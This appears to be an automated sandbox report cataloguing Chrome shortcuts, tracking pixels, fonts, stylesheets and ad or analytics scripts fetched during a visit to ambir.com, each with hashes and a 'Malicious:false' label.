                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 19:28:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                              Entropy (8bit):3.989875614447738
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8XYtdkTIYRHDidAKZdA1vehDiZUkwqehKy+R:8HvKsy
                                                                                                                                                                                              MD5:7FD52E0209AC6FF0155DF0B2E6672EF1
                                                                                                                                                                                              SHA1:5B8A6635884DFE2177547E7B06472B4E5826D0AC
                                                                                                                                                                                              SHA-256:32270BDF0461390609A4A0FD257A39B7589C602A0C1C838107B36A00C47F0BD4
                                                                                                                                                                                              SHA-512:9277602858B6D3DF70CFBE6873A4F29F55D4F48DAA78756CD39C1968BF440D49F42576346154DA5A62DE3F94903C9F74B0CC866A2E85F7ACD65A4CFF1CF6F9C4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.........;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 19:28:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                              Entropy (8bit):3.980030372061639
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8cdkTIYRHDidAKZdA1hehBiZUk1W1qehIy+C:83vq9oy
                                                                                                                                                                                              MD5:F4335213530ED025E2D863532A5A21BE
                                                                                                                                                                                              SHA1:ABF17B567B2AB1E19AB92E8D35D044E4E7D0B091
                                                                                                                                                                                              SHA-256:A1F8B486FFAC121104D4E31BEF27187B9DB78A66F64E299A0818F965C450A35C
                                                                                                                                                                                              SHA-512:C6021E8FD36268A8FAC76A3D9660900ACDF3B6D0D7AB4C7BD89D456DF8084F78FED5BB91F9232E702BBF86CAE19ED0A9A7F5967D1E094F017324299A5B1C5561
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,........;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 19:28:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2683
                                                                                                                                                                                              Entropy (8bit):3.991030005177699
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8rdkTIYRHDidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbCy+yT+:8Sv0T/TbxWOvTbCy7T
                                                                                                                                                                                              MD5:D9B8075EB40D26B178911244D5B6B27B
                                                                                                                                                                                              SHA1:44689D54E8B91CC067FFE37F560E6DAF3F2BFEC4
                                                                                                                                                                                              SHA-256:75868C89A6F1B0C5999FDF303CE879A4C5CAF9A14951A9FB7FDCEF3338DB5D8C
                                                                                                                                                                                              SHA-512:1A1AC4A9B6E829A4D6D4183A0B1E2AE4BE5E5CDAAADA66C03965BE004B653F771409725F933CB3B0F5E4D3C5CD5635FFC1499E056751C2A788BA419F7A94577E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....`!...;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://d.adroll.com/uev0?xae1=GXXT3DJJNNBKHGBC62RAND&xen1=productView&xoe1=YK5WPZRLU5ADVBKNOYLBSZ&xpe1=PQV7D44IFRBCBMEQBHSAR6
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1307
                                                                                                                                                                                              Entropy (8bit):4.816358108075341
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:jMuq9UNV0bVcFpMuq9UddJ0VcGpMuq9Ud3VcSxpMuq9UoJ0Vcs8JGpMuq9UsVcsZ:hTNkNBOJYzJSJQTLA
                                                                                                                                                                                              MD5:371705095CE3DA3054F5FDBC5B887234
                                                                                                                                                                                              SHA1:080828DA073F5AA280B58BBDAFF7CE06C24260E5
                                                                                                                                                                                              SHA-256:D60AB551B12381F4FB3A1E96340EDB2F9F616F154BC22DF54ABE1CF21F768418
                                                                                                                                                                                              SHA-512:4E7DD3436D8CB529ACC0033BB536AD09AD8585D9D0CE8013BAFE8F45DA38814B1C36DAA01757699F9FA943B44323BB2F50210C97A1ABA67CB0A0CCA0A54FB353
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:"https://forms.zohopublic.com/formstatic/fonts?family=Open+Sans:400,700i,700,600i,600,400i,300i,300"
                                                                                                                                                                                              Preview:@font-face {.font-family:"Open Sans";.font-weight:400;.font-style:normal;.src:url("https://webfonts.zohowebstatic.com/opensans/font.woff") format("woff");}.@font-face {.font-family:"Open Sans";.font-weight:700;.font-style:italic;.src:url("https://webfonts.zohowebstatic.com/opensansbolditalic/font.woff") format("woff");}.@font-face {.font-family:"Open Sans";.font-weight:700;.font-style:normal;.src:url("https://webfonts.zohowebstatic.com/opensansbold/font.woff") format("woff");}.@font-face {.font-family:"Open Sans";.font-weight:600;.font-style:italic;.src:url("https://webfonts.zohowebstatic.com/opensanssemibolditalic/font.woff") format("woff");}.@font-face {.font-family:"Open Sans";.font-weight:600;.font-style:normal;.src:url("https://webfonts.zohowebstatic.com/opensanssemibold/font.woff") format("woff");}.@font-face {.font-family:"Open Sans";.font-weight:400;.font-style:italic;.src:url("https://webfonts.zohowebstatic.com/opensansitalic/font.woff") format("woff");}.@font-face {.font-fami
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (31997)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):44342
                                                                                                                                                                                              Entropy (8bit):5.0793850768725
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:UCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RSGc7UuHjRUQuFBt33:PITMFC4dbMVRSGcgRDV
                                                                                                                                                                                              MD5:F416F9031FEF25AE25BA9756E3EB6978
                                                                                                                                                                                              SHA1:E2A600E433DF72B4CFDE93D7880E3114917A3CBE
                                                                                                                                                                                              SHA-256:A53C43F834B32309B084EA9314DF8307E9C78CEE2202C6E07F216AE4AE5B704D
                                                                                                                                                                                              SHA-512:6CFB3B01EEA956F84E4A221CC940A547BFEAD8E02C462A2FC38BC0917FB325BC374A101E7AA7B3AB9D11208708511ABB39ADB4AD6DA7DAAF9FC9704D714F65AF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */.!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fil
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):523948
                                                                                                                                                                                              Entropy (8bit):5.473487092747359
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:hewzYtaw6XdbqmMkRc7Q6a8mtBE1MUU9W+ryjcPx04YXGdFTyUj1:h3c7Q6a8sKd+ryjcPx0yFTZ
                                                                                                                                                                                              MD5:B4AE065E3D9A5123B66FE07247E433B3
                                                                                                                                                                                              SHA1:FAA7E7324B548D6CA355708A15D2BEB08E695698
                                                                                                                                                                                              SHA-256:5328D6671B1F94874CFC9FB8A3F70102EFA4B92D1703C418BFA42CF6AFB311CD
                                                                                                                                                                                              SHA-512:A146DBFCDB3C40DE8E027C5708BA0872445015F80C070A59887AA77E7F9EBEB0C88E119D8FBBF5D6B8139F383EE7603D4901AD072BEEE9AD15495D37FA342776
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css
                                                                                                                                                                                              Preview::root{--woocommerce:#7F54B3;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#7F54B3;--wc-primary-text:white;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#b3af54;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}@keyframes spin{100%{transform:rotate(360deg)}}@font-face{font-family:star;src:url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.woff2) format("woff2"),url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.woff) format("woff"),url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.ttf) format("truetype");font-weight:400;font-style:normal}@font-face{font-family:WooCommerce;src:url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.woff2) format("woff2"),url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.woff) format("woff"),url(https://ambir.com/wp-c
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1320)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                              Entropy (8bit):5.131237769754918
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:B+9VqsRthp0Mejm4s1RWe2LSaaq1aa5/DM/RR2ns4t8oYRFOobvuh0usUiEFyB/6:B+9bLToj4we2L9DM/RQnv8oYjOobG53l
                                                                                                                                                                                              MD5:BE30DFD7230F4DE4D17D5F3B90388327
                                                                                                                                                                                              SHA1:00A95A12C3385622AD1B8B2E42726140C3BEEF9F
                                                                                                                                                                                              SHA-256:1DA6D01EB753E4A4A38C6C3B1B6E985264774FB3BB436EB7CF1C928213525469
                                                                                                                                                                                              SHA-512:41098F35DE2D73B7DA2521D3CB8AED11022BDB07BFF04556AEAD532A9DCC6BE1C23F7A5AD9E703DAA9497F8B5BDBAC440016149F3C54D457A54555EB631C6AEE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js
                                                                                                                                                                                              Preview:/*! elementor - v3.25.0 - 19-11-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{paragraph:"p:first"},classes:{dropCap:"elementor-drop-cap",dropCapLetter:"elementor-drop-cap-letter"}}}getDefaultElements(){const e=this.getSettings("selectors"),t=this.getSettings("classes"),r=jQuery("<span>",{class:t.dropCap}),p=jQuery("<span>",{class:t.dropCapLetter});return r.append(p),{$paragraph:this.$element.find(e.paragraph),$dropCap:r,$dropCapLetter:p}}wrapDropCap(){if(!this.getElementSettings("drop_cap"))return void(this.dropCapLetter&&(this.elements.$dropCap.remove(),this.elements.$paragraph.prepend(this.dropCapLetter),this.dropCapLetter=""));const e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13119
                                                                                                                                                                                              Entropy (8bit):5.299812752404781
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:EREQ9EQRExCpI2JzayqLdc3G20Khdb1cpbBZ84fN8d4P3kE:rQ9E3UNGdc3G2fDW7ffN8dU3kE
                                                                                                                                                                                              MD5:67E425F632F58FCF77379A0D273B2CE1
                                                                                                                                                                                              SHA1:88E2ACFD6997AC5E1A6FD158913F6E9FB153F235
                                                                                                                                                                                              SHA-256:7C2036F0FCBAC8849FD23B83B842AB6A9DCF7BD72517F1336E533CC71A36BEFC
                                                                                                                                                                                              SHA-512:8292A054FE5AF6177FA53CC329457BBD3267BFDF9C4EA1CE16599525D618BA05417122E4D5ED6F441FAFE569AD763EA1881E1BD114597B6A4D3E42049047A4CF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://x.adroll.com/igs?advertisable=GXXT3DJJNNBKHGBC62RAND&fpc=d3ee31a855380a6a19350bbaa666e259
                                                                                                                                                                                              Preview:[{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"GXXT3DJJNNBKHGBC62RAND","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","updateURL":"https://x.adroll.com/update/GXXT3DJJNNBKHGBC62RAND?p=BQHT7jGoVTgKahk1C7qmZuJZAAAAAQAILntLAPzujHzO_O6MfM4","userBiddingSignals":{"update_timestamp":1732134519,"join_timestamp":1732134519}},{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"prospecting","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","trustedBiddingSignalsKeys":["p74MW3","pn8Jc2","pkUicw","p8Baue","pmcQnW","pI1eyS","timestamp"],"updateURL":"https://x.adroll.com/update/prospecting/GXXT3DJJNNBKHGBC62RAND?p=BQHT7jGoVTgKahk1C7qmZuJZAAAAAQAILntLAPzujHzO_O6MfM4","ads":[{"renderURL":"https://x.adroll.com/ads/2ogMSLhN3K","m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                              Entropy (8bit):4.9970807338
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:qVZxVsW+KWRIJaGNEXW0YEUF3Rz9JDeIeA7vZktZ6ihckAqRAdu6/GYlWX/ZiQnS:qzxVjWR0NNEXW0YBhb6Q+r6IAqJmW/ZG
                                                                                                                                                                                              MD5:9234ED56A79823B9DE5A95185CC56009
                                                                                                                                                                                              SHA1:2BE633E7BECC077DF2713E53FCD56EDAD030878D
                                                                                                                                                                                              SHA-256:D0F48B2BC5E28DA5CBF56E67651B71248A8EED62771656A70D3E197D8D2E9D97
                                                                                                                                                                                              SHA-512:F7DBFB602160664EC9A80F1202F140EEE16288B3F88A4B12E8F58FFEE28F83713F19E0AF9EDD73A3EDDABAE476ACA97340D72648C41F9B3FCE93A8BB242FA085
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient-bucket5/storage.html?v=1732053196593
                                                                                                                                                                                              Preview:<html><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type">.</head><body><script type="text/javascript" src="storage.js?v=1732053196593"></script></body></html>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4825), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4825
                                                                                                                                                                                              Entropy (8bit):5.79823636863323
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTacRq938CT5:1dCqSF9Q6RX9hq0zFRg38q
                                                                                                                                                                                              MD5:CC301D2A61B7720FA16418064AD162FB
                                                                                                                                                                                              SHA1:07A1D14F8A74250A8A16CECB73D017566E471B50
                                                                                                                                                                                              SHA-256:D241A92DA58AAAE1E55F48C484F1465F31822DAA3D50B84CA293E527C60F398A
                                                                                                                                                                                              SHA-512:14E781780FD0AFA576D648E093735621A7752452ABFA6BBA801AB115E959B290CC90EE34CC7F65D59171A50C333C4B3566C29DEE941CDEEE7E94CE18E960BBF9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1070729751/?random=1732134501018&cv=11&fst=1732134501018&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                              MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                                                                                                                              SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                                                                                                                              SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                                                                                                                              SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://x.adroll.com/attribution/trigger?fpc=d3ee31a855380a6a19350bbaa666e259&advertisable_eid=GXXT3DJJNNBKHGBC62RAND&conversion_type=PageView&conversion_value=0.0&currency=USC&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F
                                                                                                                                                                                              Preview:OK
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):272
                                                                                                                                                                                              Entropy (8bit):6.49706053618473
                                                                                                                                                                                              Encrypted:false
